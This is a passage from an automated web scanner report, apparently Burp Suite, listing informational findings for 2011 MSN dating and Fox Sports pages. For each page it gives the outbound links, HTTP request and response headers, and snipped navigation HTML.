<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li class="first"><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="logo"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
<strong><a href="http://dating.msn.com/msn/index.aspx?mmrd=1">Dating & Personals</a></strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li class="last"><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="first"><a href="http://dating.msn.com/help/help.aspx?lid=413">Help</a></li><li><a href="http://feedback.msn.com/">Feedback</a></li><li class="last"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.238. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The page was loaded from a URL containing a query string:

http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936

The response contains the following links to other domains:

http://advertising.msn.com/msn/
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/om/js/lt/lt.js
http://c.redacted/c.gif?di=2558&pi=7327&ps=66851&tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&rf=
http://careers.redacted/
http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://dating.redacted/help/help.aspx?lid=413
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://dating.redacted/msn/index.aspx?mmrd=1
http://download.live.com/?sku=messenger
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/superfans/
http://entertainment.msn.com/video/?from=en-us_msnhp
http://feedback.redacted/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/diet-and-fitness.aspx
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/gas-traffic.aspx
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://passport.match.com/passport/ppLogin.asp
http://realestate.redacted/
http://specials.redacted/alphabet.aspx
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.google-analytics.com/urchin.js
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3096434/ns/msnbc_tv
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=6f41ea2e-099d-4faf-baad-60917bfedb99; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Session=SID=4A15DA07-7D47-4FFA-9D6B-BFCCD012B62C&Th=10&TID=516068; path=/
Set-Cookie: UMID=7520ca2e-e5a7-4da6-a3c1-3ade5a050562; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>

<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div id="reporting" style="display:none;"><img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=2558&pi=7327&ps=66851&tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&rf=" />
   <div id="omni">
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
</div>

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/"> Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/"> TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet & Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/"><strong>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li class="first"><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="logo"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
<strong><a href="http://dating.msn.com/msn/index.aspx?mmrd=1">Dating & Personals</a></strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li class="last"><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="first"><a href="http://dating.msn.com/help/help.aspx?lid=413">Help</a></li><li><a href="http://feedback.msn.com/">Feedback</a></li><li class="last"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.239. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/home/home.asp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/beacon.js
http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg
http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://fitbie.redacted/
http://foxsoccer.tv/
http://foxsports.seenon.com/
http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav
http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2
http://foxsports.seenon.com/?v=fox-sports_mlb
http://foxsports.seenon.com/?v=fox-sports_nascar
http://foxsports.seenon.com/?v=fox-sports_nba
http://foxsports.seenon.com/?v=fox-sports_ncaa
http://foxsports.seenon.com/?v=fox-sports_nhl
http://foxsports.seenon.com/?v=foxsports-nfl
http://fsr-pr.clearchannel.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://games.redacted/
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&w=136&h=102
http://insidefights.com/
http://insidemsn.wordpress.com/
http://investing.money.redacted/investments/stock-price
http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8
http://lifestyle.redacted/default.aspx
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://money.redacted/investing
http://money.redacted/money-video
http://money.redacted/personal-finance
http://moneycentral.msn.com/home.asp
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://redacted/
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://realestate.redacted/
http://rss.redacted/
http://s7.addthis.com/js/152/addthis_widget.js
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3
http://specials.redacted/alphabet.aspx
http://surveys2.researchresults.com/192/0030/1920030.htm?l=1
http://thebubble.redacted/
http://tv.redacted/
http://wonderwall.redacted/
http://www.baseballamerica.com/
http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=FOXSP
http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1
http://www.delish.com/
http://www.fox.com/
http://www.foxcareers.com/
http://www.foxdeportes.com/
http://www.foxnews.com/
http://www.foxsportsarizona.com/
http://www.foxsportscarolinas.com/
http://www.foxsportsdetroit.com/
http://www.foxsportsdetroit.com/01/26/11/MSU-Insider-Spartans-down-not-necessaril/landing.html?blockID=398109&feedID=3701
http://www.foxsportsflorida.com/
http://www.foxsportsflorida.com/01/26/11/Heat-are-finding-times-finally-on-their-/landing_reiter.html?blockID=398033&feedID=7926
http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&feedID=7926
http://www.foxsportshouston.com/
http://www.foxsportskansascity.com/
http://www.foxsportsmidwest.com/
http://www.foxsportsnorth.com/
http://www.foxsportsohio.com/
http://www.foxsportssouth.com/
http://www.foxsportssouthwest.com/
http://www.foxsportssupports.com/
http://www.foxsportstennessee.com/
http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&feedID=3732
http://www.foxsportswest.com/
http://www.foxsportswisconsin.com/
http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&feedID=5059
http://www.fuel.tv/
http://www.fxnetworks.com/
http://www.golfweek.com/
http://www.heavy.com/mma/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.nesn.com/
http://www.newscorp.com/
http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar
http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596
http://www.scenedaily.com/
http://www.scout.com/
http://www.speed.com/
http://www.speedtv.com/
http://www.thefightnetwork.com/
http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068
http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068
http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068
http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068
http://www.ticketsnow.com/golf-tickets/?partnerCode=16068
http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068
http://www.ticketsnow.com/nba-tickets/?partnerCode=16068
http://www.ticketsnow.com/nhl-tickets/
http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068
http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068
http://www.tvg.com/special/FoxSportsJumpPage_final.htm
http://www.whatifsports.com/
http://www.yardbarker.com/rumors
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249503
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=20
Date: Sat, 29 Jan 2011 23:49:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">

                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">

